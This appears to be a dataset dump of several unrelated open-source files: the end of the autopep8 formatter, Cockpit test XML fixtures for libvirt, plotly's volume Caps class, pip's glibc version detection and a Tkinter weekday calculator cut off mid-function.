if n_ind == ind and not is_continued_stmt(source[n]):
n_log = start_lines.index(n)
source = local_fix(source, start_log, n_log - 1,
start_lines, end_lines,
indents, last_line)
start_log = n_log + 1
start = start_lines[start_log]
only_block = False
break
if only_block:
end_log, end = find_le(start_lines, end - 1)
continue
source = local_fix(source, start_log, end_log,
start_lines, end_lines,
indents, last_line)
break
return ''.join(source)
def extract_code_from_function(function):
"""Return code handled by function."""
if not function.__name__.startswith('fix_'):
return None
code = re.sub('^fix_', '', function.__name__)
if not code:
return None
try:
int(code[1:])
except ValueError:
return None
return code
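# Editor's note: illustrative behaviour of extract_code_from_function(), added
# for clarity and not part of the original module. Only functions named
# fix_<code>, where <code> is a letter followed by digits, yield a code.
#
#     def fix_e712(source, aggressive=False): ...
#     extract_code_from_function(fix_e712)        # -> 'e712'
#
#     def fix_whitespace(line): ...
#     extract_code_from_function(fix_whitespace)  # -> None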
def create_parser():
"""Return command-line parser."""
# Do import locally to be friendly to those who use autopep8 as a library
# and are supporting Python 2.6.
import argparse
parser = argparse.ArgumentParser(description=docstring_summary(__doc__),
prog='autopep8')
parser.add_argument('--version', action='version',
version='%(prog)s ' + __version__)
parser.add_argument('-v', '--verbose', action='count', dest='verbose',
default=0,
help='print verbose messages; '
'multiple -v result in more verbose messages')
parser.add_argument('-d', '--diff', action='store_true', dest='diff',
help='print the diff for the fixed source')
parser.add_argument('-i', '--in-place', action='store_true',
help='make changes to files in place')
parser.add_argument('-r', '--recursive', action='store_true',
help='run recursively over directories; '
'must be used with --in-place or --diff')
parser.add_argument('-j', '--jobs', type=int, metavar='n', default=1,
help='number of parallel jobs; '
'match CPU count if value is less than 1')
parser.add_argument('-p', '--pep8-passes', metavar='n',
default=-1, type=int,
help='maximum number of additional pep8 passes '
'(default: infinite)')
parser.add_argument('-a', '--aggressive', action='count', default=0,
help='enable non-whitespace changes; '
'multiple -a result in more aggressive changes')
parser.add_argument('--experimental', action='store_true',
help='enable experimental fixes')
parser.add_argument('--exclude', metavar='globs',
help='exclude file/directory names that match these '
'comma-separated globs')
parser.add_argument('--list-fixes', action='store_true',
help='list codes for fixes; '
'used by --ignore and --select')
parser.add_argument('--ignore', metavar='errors', default='',
help='do not fix these errors/warnings '
'(default: {0})'.format(DEFAULT_IGNORE))
parser.add_argument('--select', metavar='errors', default='',
help='fix only these errors/warnings (e.g. E4,W)')
parser.add_argument('--max-line-length', metavar='n', default=79, type=int,
help='set maximum allowed line length '
'(default: %(default)s)')
parser.add_argument('--range', metavar='line', dest='line_range',
default=None, type=int, nargs=2,
help='only fix errors found within this inclusive '
'range of line numbers (e.g. 1 99); '
'line numbers are indexed at 1')
parser.add_argument('--indent-size', default=DEFAULT_INDENT_SIZE,
type=int, metavar='n',
help='number of spaces per indent level '
'(default %(default)s)')
parser.add_argument('files', nargs='*',
help="files to format or '-' for standard in")
return parser
def parse_args(arguments):
"""Parse command-line options."""
parser = create_parser()
args = parser.parse_args(arguments)
if not args.files and not args.list_fixes:
parser.error('incorrect number of arguments')
args.files = [decode_filename(name) for name in args.files]
if '-' in args.files:
if len(args.files) > 1:
parser.error('cannot mix stdin and regular files')
if args.diff:
parser.error('--diff cannot be used with standard input')
if args.in_place:
parser.error('--in-place cannot be used with standard input')
if args.recursive:
parser.error('--recursive cannot be used with standard input')
if len(args.files) > 1 and not (args.in_place or args.diff):
parser.error('autopep8 only takes one filename as argument '
'unless the "--in-place" or "--diff" args are '
'used')
if args.recursive and not (args.in_place or args.diff):
parser.error('--recursive must be used with --in-place or --diff')
if args.exclude and not args.recursive:
parser.error('--exclude is only relevant when used with --recursive')
if args.in_place and args.diff:
parser.error('--in-place and --diff are mutually exclusive')
if args.max_line_length <= 0:
parser.error('--max-line-length must be greater than 0')
if args.select:
args.select = args.select.split(',')
if args.ignore:
args.ignore = args.ignore.split(',')
elif not args.select:
if args.aggressive:
# Enable everything by default if aggressive.
args.select = ['E', 'W']
else:
args.ignore = DEFAULT_IGNORE.split(',')
if args.exclude:
args.exclude = args.exclude.split(',')
else:
args.exclude = []
if args.jobs < 1:
# Do not import multiprocessing globally in case it is not supported
# on the platform.
import multiprocessing
args.jobs = multiprocessing.cpu_count()
if args.jobs > 1 and not args.in_place:
parser.error('parallel jobs requires --in-place')
if args.line_range:
if args.line_range[0] <= 0:
parser.error('--range must be positive numbers')
if args.line_range[0] > args.line_range[1]:
parser.error('First value of --range should be less than or equal '
'to the second')
return args
def decode_filename(filename):
"""Return Unicode filename."""
if isinstance(filename, unicode):
return filename
else:
return filename.decode(sys.getfilesystemencoding())
def supported_fixes():
"""Yield pep8 error codes that autopep8 fixes.
Each item we yield is a tuple of the code followed by its
description.
"""
yield ('E101', docstring_summary(reindent.__doc__))
instance = FixPEP8(filename=None, options=None, contents='')
for attribute in dir(instance):
code = re.match('fix_([ew][0-9][0-9][0-9])', attribute)
if code:
yield (
code.group(1).upper(),
re.sub(r'\s+', ' ',
docstring_summary(getattr(instance, attribute).__doc__))
)
for (code, function) in sorted(global_fixes()):
yield (code.upper() + (4 - len(code)) * ' ',
re.sub(r'\s+', ' ', docstring_summary(function.__doc__)))
for code in sorted(CODE_TO_2TO3):
yield (code.upper() + (4 - len(code)) * ' ',
re.sub(r'\s+', ' ', docstring_summary(fix_2to3.__doc__)))
def docstring_summary(docstring):
"""Return summary of docstring."""
return docstring.split('\n')[0]
def line_shortening_rank(candidate, indent_word, max_line_length,
experimental=False):
"""Return rank of candidate.
This is for sorting candidates.
"""
if not candidate.strip():
return 0
rank = 0
lines = candidate.split('\n')
offset = 0
if (
not lines[0].lstrip().startswith('#') and
lines[0].rstrip()[-1] not in '([{'
):
for (opening, closing) in ('()', '[]', '{}'):
# Don't penalize empty containers that aren't split up. Things like
# this "foo(\n )" aren't particularly good.
opening_loc = lines[0].find(opening)
closing_loc = lines[0].find(closing)
if opening_loc >= 0:
if closing_loc < 0 or closing_loc != opening_loc + 1:
offset = max(offset, 1 + opening_loc)
current_longest = max(offset + len(x.strip()) for x in lines)
rank += 4 * max(0, current_longest - max_line_length)
rank += len(lines)
# Too much variation in line length is ugly.
rank += 2 * standard_deviation(len(line) for line in lines)
bad_staring_symbol = {
'(': ')',
'[': ']',
'{': '}'}.get(lines[0][-1])
if len(lines) > 1:
if (
bad_staring_symbol and
lines[1].lstrip().startswith(bad_staring_symbol)
):
rank += 20
for lineno, current_line in enumerate(lines):
current_line = current_line.strip()
if current_line.startswith('#'):
continue
for bad_start in ['.', '%', '+', '-', '/']:
if current_line.startswith(bad_start):
rank += 100
# Do not tolerate operators on their own line.
if current_line == bad_start:
rank += 1000
if current_line.endswith(('(', '[', '{', '.')):
# Avoid lonely opening. They result in longer lines.
if len(current_line) <= len(indent_word):
rank += 100
# Avoid the ugliness of ", (\n".
if (
current_line.endswith('(') and
current_line[:-1].rstrip().endswith(',')
):
rank += 100
# Also avoid the ugliness of "foo.\nbar"
if current_line.endswith('.'):
rank += 100
if has_arithmetic_operator(current_line):
rank += 100
if current_line.endswith(('%', '(', '[', '{')):
rank -= 20
# Try to break list comprehensions at the "for".
if current_line.startswith('for '):
rank -= 50
if current_line.endswith('\\'):
# If a line ends in \-newline, it may be part of a
# multiline string. In that case, we would like to know
# how long that line is without the \-newline. If it's
# longer than the maximum, or has comments, then we assume
# that the \-newline is an okay candidate and only
# penalize it a bit.
total_len = len(current_line)
lineno += 1
while lineno < len(lines):
total_len += len(lines[lineno])
if lines[lineno].lstrip().startswith('#'):
total_len = max_line_length
break
if not lines[lineno].endswith('\\'):
break
lineno += 1
if total_len < max_line_length:
rank += 10
else:
rank += 100 if experimental else 1
# Prefer breaking at commas rather than colon.
if ',' in current_line and current_line.endswith(':'):
rank += 10
rank += 10 * count_unbalanced_brackets(current_line)
return max(0, rank)
def standard_deviation(numbers):
"""Return standard devation."""
numbers = list(numbers)
if not numbers:
return 0
mean = sum(numbers) / len(numbers)
return (sum((n - mean) ** 2 for n in numbers) /
len(numbers)) ** .5
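# Editor's note: a quick worked example of the population standard deviation
# computed above (added for clarity, not part of the original module):
#
#     standard_deviation([2, 4, 4, 4, 5, 5, 7, 9])
#     # mean = 5, squared deviations sum to 32, 32 / 8 = 4, sqrt(4) = 2.0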
def has_arithmetic_operator(line):
"""Return True if line contains any arithmetic operators."""
for operator in pep8.ARITHMETIC_OP:
if operator in line:
return True
return False
def count_unbalanced_brackets(line):
"""Return number of unmatched open/close brackets."""
count = 0
for opening, closing in ['()', '[]', '{}']:
count += abs(line.count(opening) - line.count(closing))
return count
def split_at_offsets(line, offsets):
"""Split line at offsets.
Return list of strings.
"""
result = []
previous_offset = 0
current_offset = 0
for current_offset in sorted(offsets):
if current_offset < len(line) and previous_offset != current_offset:
result.append(line[previous_offset:current_offset].strip())
previous_offset = current_offset
result.append(line[current_offset:])
return result
class LineEndingWrapper(object):
r"""Replace line endings to work with sys.stdout.
It seems that sys.stdout expects only '\n' as the line ending, no matter
the platform. Otherwise, we get repeated line endings.
"""
def __init__(self, output):
self.__output = output
def write(self, s):
self.__output.write(s.replace('\r\n', '\n').replace('\r', '\n'))
def flush(self):
self.__output.flush()
def match_file(filename, exclude):
"""Return True if file is okay for modifying/recursing."""
base_name = os.path.basename(filename)
if base_name.startswith('.'):
return False
for pattern in exclude:
if fnmatch.fnmatch(base_name, pattern):
return False
if not os.path.isdir(filename) and not is_python_file(filename):
return False
return True
def find_files(filenames, recursive, exclude):
"""Yield filenames."""
while filenames:
name = filenames.pop(0)
if recursive and os.path.isdir(name):
for root, directories, children in os.walk(name):
filenames += [os.path.join(root, f) for f in children
if match_file(os.path.join(root, f),
exclude)]
directories[:] = [d for d in directories
if match_file(os.path.join(root, d),
exclude)]
else:
yield name
def _fix_file(parameters):
"""Helper function for optionally running fix_file() in parallel."""
if parameters[1].verbose:
print('[file:{0}]'.format(parameters[0]), file=sys.stderr)
try:
fix_file(*parameters)
except IOError as error:
print(unicode(error), file=sys.stderr)
def fix_multiple_files(filenames, options, output=None):
"""Fix list of files.
Optionally fix files recursively.
"""
filenames = find_files(filenames, options.recursive, options.exclude)
if options.jobs > 1:
import multiprocessing
pool = multiprocessing.Pool(options.jobs)
pool.map(_fix_file,
[(name, options) for name in filenames])
else:
for name in filenames:
_fix_file((name, options, output))
def is_python_file(filename):
"""Return True if filename is Python file."""
if filename.endswith('.py'):
return True
try:
with open_with_encoding(filename) as f:
first_line = f.readlines(1)[0]
except (IOError, IndexError):
return False
if not PYTHON_SHEBANG_REGEX.match(first_line):
return False
return True
def is_probably_part_of_multiline(line):
"""Return True if line is likely part of a multiline string.
When multiline strings are involved, pep8 reports the error as being
at the start of the multiline string, which doesn't work for us.
"""
return (
'"""' in line or
"'''" in line or
line.rstrip().endswith('\\')
)
def main():
"""Tool main."""
try:
# Exit on broken pipe.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except AttributeError: # pragma: no cover
# SIGPIPE is not available on Windows.
pass
try:
args = parse_args(sys.argv[1:])
if args.list_fixes:
for code, description in sorted(supported_fixes()):
print('{code} - {description}'.format(
code=code, description=description))
return 0
if args.files == ['-']:
assert not args.in_place
# LineEndingWrapper is unnecessary here due to the symmetry between
# standard in and standard out.
sys.stdout.write(
fix_code(
sys.stdin.read(),
args,
encoding=sys.stdin.encoding))
else:
if args.in_place or args.diff:
args.files = list(set(args.files))
else:
assert len(args.files) == 1
assert not args.recursive
fix_multiple_files(args.files, args, sys.stdout)
except KeyboardInterrupt:
return 1 # pragma: no cover
class CachedTokenizer(object):
"""A one-element cache around tokenize.generate_tokens().
Original code written by Ned Batchelder, in coverage.py.
"""
def __init__(self):
self.last_text = None
self.last_tokens = None
def generate_tokens(self, text):
"""A stand-in for tokenize.generate_tokens()."""
if text != self.last_text:
string_io = io.StringIO(text)
self.last_tokens = list(
tokenize.generate_tokens(string_io.readline)
)
self.last_text = text
return self.last_tokens
_cached_tokenizer = CachedTokenizer()
generate_tokens = _cached_tokenizer.generate_tokens
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | -5,528,320,661,522,171,000 | 32.020613 | 79 | 0.537245 | false |
deryni/cockpit | test/verify/machinesxmls.py | 1 | 4667 | # This file is part of Cockpit.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
TEST_NETWORK_XML = """
<network>
<name>test_network</name>
<forward mode='nat'/>
<bridge name='virbr1' stp='on' delay='0'/>
<mac address='52:54:00:bc:93:8e'/>
<ip address='192.168.123.1' netmask='255.255.255.0'>
<dhcp>
<range start='192.168.123.2' end='192.168.123.254'/>
</dhcp>
</ip>
</network>
"""
TEST_NETWORK2_XML = """
<network>
<name>test_network2</name>
<bridge name='virbr1' stp='on' delay='0'/>
<mac address='52:54:00:79:86:29'/>
<domain name='test'/>
<bandwidth>
<inbound average='1000' peak='9000' burst='5000'/>
<outbound average='2000' peak='3000' burst='4000'/>
</bandwidth>
<ip family='ipv6' address='fd00:e81d:a6d7:55::1' prefix='64'>
<dhcp>
<range start='fd00:e81d:a6d7:55::100' end='fd00:e81d:a6d7:55::1ff'/>
<host name='simon' ip='2001:db8:ca2:2:3::1'/>
<host id='0:1:0:1:18:aa:62:fe:0:16:3e:44:55:66' ip='2001:db8:ca2:2:3::2'/>
</dhcp>
</ip>
<ip address='192.168.100.1' netmask='255.255.255.0'>
<dhcp>
<range start='192.168.100.128' end='192.168.100.170'/>
<host mac='00:16:3E:5D:C7:9E' name='paul' ip='192.168.122.254'/>
</dhcp>
</ip>
</network>
"""
TEST_NETWORK3_XML = """
<network>
<name>test_network3</name>
<forward mode='bridge'/>
<bridge name='br0'/>
</network>
"""
TEST_NETWORK4_XML = """
<network>
<name>test_network4</name>
</network>
"""
SPICE_XML = """
<video>
<model type='vga' heads='1' primary='yes'/>
<alias name='video0'/>
</video>
<graphics type='spice' port='5900' autoport='yes' listen='127.0.0.1'>
<listen type='address' address='127.0.0.1'/>
<image compression='off'/>
</graphics>
"""
VNC_XML = """
<video>
<model type='vga' heads='1' primary='yes'/>
<alias name='video0'/>
</video>
<graphics type='vnc' port='5900' autoport='yes' listen='127.0.0.1'>
<listen type='address' address='127.0.0.1'/>
</graphics>
"""
CONSOLE_XML = """
<console type='file'>
<target type='serial' port='0'/>
<source path='{log}'/>
</console>
"""
PTYCONSOLE_XML = """
<serial type='pty'>
<source path='/dev/pts/3'/>
<target port='0'/>
<alias name='serial0'/>
</serial>
<console type='pty' tty='/dev/pts/3'>
<source path='/dev/pts/3'/>
<target type='serial' port='0'/>
<alias name='serial0'/>
</console>
"""
DOMAIN_XML = """
<domain type='qemu'>
<name>{name}</name>
<vcpu>1</vcpu>
<os>
<type arch='x86_64'>hvm</type>
<boot dev='hd'/>
<boot dev='network'/>
</os>
<memory unit='MiB'>256</memory>
<currentMemory unit='MiB'>256</currentMemory>
<features>
<acpi/>
</features>
<devices>
<disk type='file'>
<driver name='qemu' type='qcow2'/>
<source file='{image}'/>
<target dev='vda' bus='virtio'/>
<serial>SECOND</serial>
</disk>
<controller type='scsi' model='virtio-scsi' index='0' id='hot'/>
<interface type='network'>
<source network='default' bridge='virbr0'/>
<target dev='vnet0'/>
</interface>
<channel type='unix'>
<target type='virtio' name='org.qemu.guest_agent.0'/>
<address type='virtio-serial' controller='0' bus='0' port='1'/>
</channel>
{console}
{graphics}
</devices>
</domain>
"""
POOL_XML = """
<pool type='dir'>
<name>images</name>
<target>
<path>{path}</path>
</target>
</pool>
"""
NETWORK_XML_PXE = """<network>
<name>pxe-nat</name>
<forward mode='nat'>
<nat>
<port start='1024' end='65535'/>
</nat>
</forward>
<bridge name='virbr0' stp='on' delay='0'/>
<mac address='52:54:00:53:7d:8e'/>
<ip address='192.168.122.1' netmask='255.255.255.0'>
<tftp root='/var/lib/libvirt/pxe-config'/>
<dhcp>
<range start='192.168.122.2' end='192.168.122.254'/>
<bootp file='pxe.cfg'/>
</dhcp>
</ip>
</network>"""
PXE_SERVER_CFG = """#!ipxe
echo Rebooting in 60 seconds
sleep 60
reboot"""
| lgpl-2.1 | 1,977,698,032,751,698,700 | 24.78453 | 80 | 0.596957 | false |
plotly/plotly.py | packages/python/plotly/plotly/graph_objs/volume/_caps.py | 2 | 6821 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Caps(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume"
_path_str = "volume.caps"
_valid_props = {"x", "y", "z"}
# x
# -
@property
def x(self):
"""
The 'x' property is an instance of X
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.X`
- A dict of string/value properties that will be passed
to the X constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
                    are entirely shaded. On the other hand, applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
                    other hand, applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.X
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
"""
The 'y' property is an instance of Y
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.Y`
- A dict of string/value properties that will be passed
to the Y constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
                    are entirely shaded. On the other hand, applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the y `slices` is 1
meaning that they are entirely shaded. On the
                    other hand, applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.Y
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# z
# -
@property
def z(self):
"""
The 'z' property is an instance of Z
that may be specified as:
- An instance of :class:`plotly.graph_objs.volume.caps.Z`
- A dict of string/value properties that will be passed
to the Z constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
                    are entirely shaded. On the other hand, applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the z `slices` is 1
meaning that they are entirely shaded. On the
                    other hand, applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.volume.caps.Z
"""
return self["z"]
@z.setter
def z(self, val):
self["z"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
x
:class:`plotly.graph_objects.volume.caps.X` instance or
dict with compatible properties
y
:class:`plotly.graph_objects.volume.caps.Y` instance or
dict with compatible properties
z
:class:`plotly.graph_objects.volume.caps.Z` instance or
dict with compatible properties
"""
def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
"""
Construct a new Caps object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.volume.Caps`
x
:class:`plotly.graph_objects.volume.caps.X` instance or
dict with compatible properties
y
:class:`plotly.graph_objects.volume.caps.Y` instance or
dict with compatible properties
z
:class:`plotly.graph_objects.volume.caps.Z` instance or
dict with compatible properties
Returns
-------
Caps
"""
super(Caps, self).__init__("caps")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.Caps
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.Caps`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("z", None)
_v = z if z is not None else _v
if _v is not None:
self["z"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
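# Editor's note: a small usage sketch, added for clarity and not part of the
# generated Plotly module. A Caps instance (or an equivalent plain dict) is
# normally supplied through the `caps` argument of plotly.graph_objects.Volume;
# the data values below are made up.
#
#     import plotly.graph_objects as go
#
#     fig = go.Figure(go.Volume(
#         x=[0, 0, 0, 0, 1, 1, 1, 1],
#         y=[0, 0, 1, 1, 0, 0, 1, 1],
#         z=[0, 1, 0, 1, 0, 1, 0, 1],
#         value=[0, 1, 2, 3, 4, 5, 6, 7],
#         caps=go.volume.Caps(
#             x=dict(show=False),          # hide the caps on the x axis
#             y=dict(show=False),
#             z=dict(show=True, fill=0.5),
#         ),
#     ))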
| mit | 863,666,565,619,956,100 | 31.327014 | 82 | 0.500806 | false |
etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/pip/_internal/utils/glibc.py | 24 | 3297 | # The following comment should be removed at some point in the future.
# mypy: strict-optional=False
from __future__ import absolute_import
import os
import sys
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
def glibc_version_string():
# type: () -> Optional[str]
"Returns glibc version string, or None if not using glibc."
return glibc_version_string_confstr() or glibc_version_string_ctypes()
def glibc_version_string_confstr():
# type: () -> Optional[str]
"Primary implementation of glibc_version_string using os.confstr."
# os.confstr is quite a bit faster than ctypes.DLL. It's also less likely
# to be broken or missing. This strategy is used in the standard library
# platform module:
# https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183
if sys.platform == "win32":
return None
try:
# os.confstr("CS_GNU_LIBC_VERSION") returns a string like "glibc 2.17":
_, version = os.confstr("CS_GNU_LIBC_VERSION").split()
except (AttributeError, OSError, ValueError):
# os.confstr() or CS_GNU_LIBC_VERSION not available (or a bad value)...
return None
return version
def glibc_version_string_ctypes():
# type: () -> Optional[str]
"Fallback implementation of glibc_version_string using ctypes."
try:
import ctypes
except ImportError:
return None
# ctypes.CDLL(None) internally calls dlopen(NULL), and as the dlopen
# manpage says, "If filename is NULL, then the returned handle is for the
# main program". This way we can let the linker do the work to figure out
# which libc our process is actually using.
process_namespace = ctypes.CDLL(None)
try:
gnu_get_libc_version = process_namespace.gnu_get_libc_version
except AttributeError:
# Symbol doesn't exist -> therefore, we are not linked to
# glibc.
return None
# Call gnu_get_libc_version, which returns a string like "2.5"
gnu_get_libc_version.restype = ctypes.c_char_p
version_str = gnu_get_libc_version()
# py2 / py3 compatibility:
if not isinstance(version_str, str):
version_str = version_str.decode("ascii")
return version_str
# platform.libc_ver regularly returns completely nonsensical glibc
# versions. E.g. on my computer, platform says:
#
# ~$ python2.7 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.7')
# ~$ python3.5 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.9')
#
# But the truth is:
#
# ~$ ldd --version
# ldd (Debian GLIBC 2.22-11) 2.22
#
# This is unfortunate, because it means that the linehaul data on libc
# versions that was generated by pip 8.1.2 and earlier is useless and
# misleading. Solution: instead of using platform, use our code that actually
# works.
def libc_ver():
# type: () -> Tuple[str, str]
"""Try to determine the glibc version
Returns a tuple of strings (lib, version) which default to empty strings
in case the lookup fails.
"""
glibc_version = glibc_version_string()
if glibc_version is None:
return ("", "")
else:
return ("glibc", glibc_version)
| gpl-3.0 | 2,129,941,661,303,765,500 | 32.642857 | 111 | 0.676979 | false |
xpowerx5005/Weekday-Calculator | Weekday Calculator.py | 1 | 11835 | #Input in the entry boxes of 'Year', 'Month' and 'Day'
#Month must be written as a number between 1-12
#Press "Calculate" button to return weekday of the given date
from time import *
from tkinter import *
class Calculator:
#GUI LAYOUT
def __init__(self, master):
self.master = master
self.months = ['January', 'january', 'February',
'february', 'March', 'march',
'April', 'april', 'May', 'may',
'June', 'june', 'July','july',
'August', 'august', 'September',
'september','October', 'october',
'November', 'november',
'December', 'december']
master.title('Weekday Calculator')
master.geometry('410x380')
master.resizable(width = False, height = False)
#Title
self.Title = Label(root, text= "Weekday Calculator",
font = ('Avenir', 18, 'normal'))
self.Title.grid(column = 0, columnspan = 7,
padx = 5, pady = 5)
#Description
self.Description = Label(root,
text= 'This program determines the specific weekday'
' for given dates \n'
'| Year (yyyy) | Month (mm) | Day (dd) |',
font = ('Avenir', 13, 'normal'))
self.Description.grid(row = 1, column = 0,
columnspan = 7, padx = 5, pady = 5)
#Entry Boxes
self.Year = Label(root, padx = 9, text = 'Year:',
font = ('Avenir', 13, 'normal'))
self.Year.grid(row = 2, sticky = W, padx = 1)
self.Yeardisplay = Entry(root, width = 33)
self.Yeardisplay.grid(row = 2, column = 1, sticky = E)
self.Month = Label(root, padx = 9, text = 'Month:',
font = ('Avenir', 13, 'normal'))
self.Month.grid(row = 3, sticky = W, padx = 0)
self.Monthdisplay = Entry(root, width = 33)
self.Monthdisplay.grid(row = 3, column = 1, sticky = E)
self.Day = Label(root, padx = 9, text = 'Day:',
font = ('Avenir', 13, 'normal'))
self.Day.grid(row = 4, sticky = W, padx = 0)
self.Daydisplay = Entry(root, width = 33)
self.Daydisplay.grid(row = 4, column = 1, sticky = E)
self.Week = Label(root, padx = 9, text= 'Weekday:',
font = ('Avenir', 13, 'normal'))
self.Week.grid(row = 5, sticky = W, padx = 0)
self.Weekdaydisplay = Entry(root, width = 33,
state = 'readonly')
self.Weekdaydisplay.grid(row = 5, column = 1, sticky = E)
self.Extradisplay = Entry(root, width = 33,
state = 'readonly')
self.Extradisplay.grid(row = 6, column = 1, sticky = E)
#Calculate Button
self.Calculate = Button(text = 'Calculate',
command = self.calculate,
font = ('Avenir', 15, 'normal'))
self.Calculate.grid(row = 7, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Clear Button
self.clear = Button(text = 'Clear',
command = self.clear,
font = ('Avenir', 15, 'normal'))
self.clear.grid(row = 8, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Exit Button
self.Exit = Button(text = 'Exit',
command = root.destroy,
font = ('Avenir', 15, 'normal'))
self.Exit.grid(row = 9, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Credits
self.Credits = Label(root, text = 'Raymond Wang 2018 ®',
font = ('Avenir', 15, 'italic'))
self.Credits.grid(row = 10, column = 0,
columnspan = 8, pady = 5, padx = 5)
#FUNCTIONS
#Clear command
def clear(self):
self.Yeardisplay.delete(0,END)
self.Monthdisplay.delete(0,END)
self.Daydisplay.delete(0,END)
self.clear_message(self.Weekdaydisplay)
self.clear_message(self.Extradisplay)
def clear_message(self, func):
func.configure(state='normal')
func.delete(0, END)
func.configure(state='readonly')
#Calculate command
def calculate(self):
year = self.Yeardisplay.get()
month = self.Monthdisplay.get()
day = self.Daydisplay.get()
if year.isdigit():
if year[0] == '0':
if len(year) == 1:
self.error_display(self.Extradisplay, 'Year 0 does not exist')
else:
self.error_display(self.Extradisplay, 'Remove preceding zeros')
elif month.isdigit():
self.month_digit(year, month, day)
elif month in self.months:
month = month.capitalize()
month_to_int = {'January':1, 'February':2,
'March':3, 'April':4,'May':5, 'June':6,
'July':7, 'August':8, 'September':9,
'October':10, 'November':11, 'December':12}
Month = str(month_to_int[month])
self.month_digit(year, Month, day)
else:
self.output(year, month, day.lstrip('0'))
elif len(year) == 0:
if len(month) == 0:
if len(day) == 0:
self.error_display(self.Extradisplay, '')
else:
self.error_display(self.Extradisplay, 'Error')
else:
self.error_display(self.Extradisplay, 'Error')
else:
self.error_display(self.Extradisplay, 'Error')
#Error handling regarding preceding zeros for day input
def month_digit(self, year, month, day):
if month[0] == '0':
if len(month) > 2:
self.error_display(self.Extradisplay, 'Remove preceding zeros')
else:
self.day_digit(year, int(month), day)
else:
self.day_digit(year, int(month), day)
#Error handling regarding preceding zeros for day input
def day_digit(self, year, month, day):
if day.isdigit():
if day[0] == '0':
if len(day) > 2:
                    self.error_display(self.Extradisplay, 'Remove preceding zeros')
else:
self.output(year, month, day.lstrip('0'))
else:
self.output(year, month, day.lstrip('0'))
else:
self.output(year, month, day.lstrip('0'))
#Error handling for month
def output(self, year, month, day):
try:
if (int(month) in [1,3,5,7,8,10,12]):
self.condition(year, month, day, '31', '')
elif (int(month) in [4,6,9,11]):
self.condition(year, month, day, '30', '')
elif int(month) == 2:
if (((int(year) % 4) == 0 and
not (int(year) % 100) == 0)
or (int(year) % 400) == 0):
if int(year) == 1712:
if int(day) == 30:
#Easter Egg
self.condition(year, month, day, '30', '')
self.change_display(self.Extradisplay,
'1712/02/30 was a real date in Sweden')
else:
self.condition(year, month, day, '29', '')
else:
self.condition(year, month, day, '29', '')
else:
self.condition(year, month, day, '28', '29')
elif int(month) > 12:
self.error_display(self.Extradisplay, 'Enter month between 1-12 or month name')
except:
self.error_display(self.Extradisplay, 'Enter month between 1-12 or month name')
#Error handling for day
def condition(self, year, month, day, lastday, leapday):
try:
if len(day) == 0 or int(day) > int(lastday):
if int(month) == 2:
if day == leapday:
                        self.error_display(self.Extradisplay, 'Not a leap year')
else:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
else:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
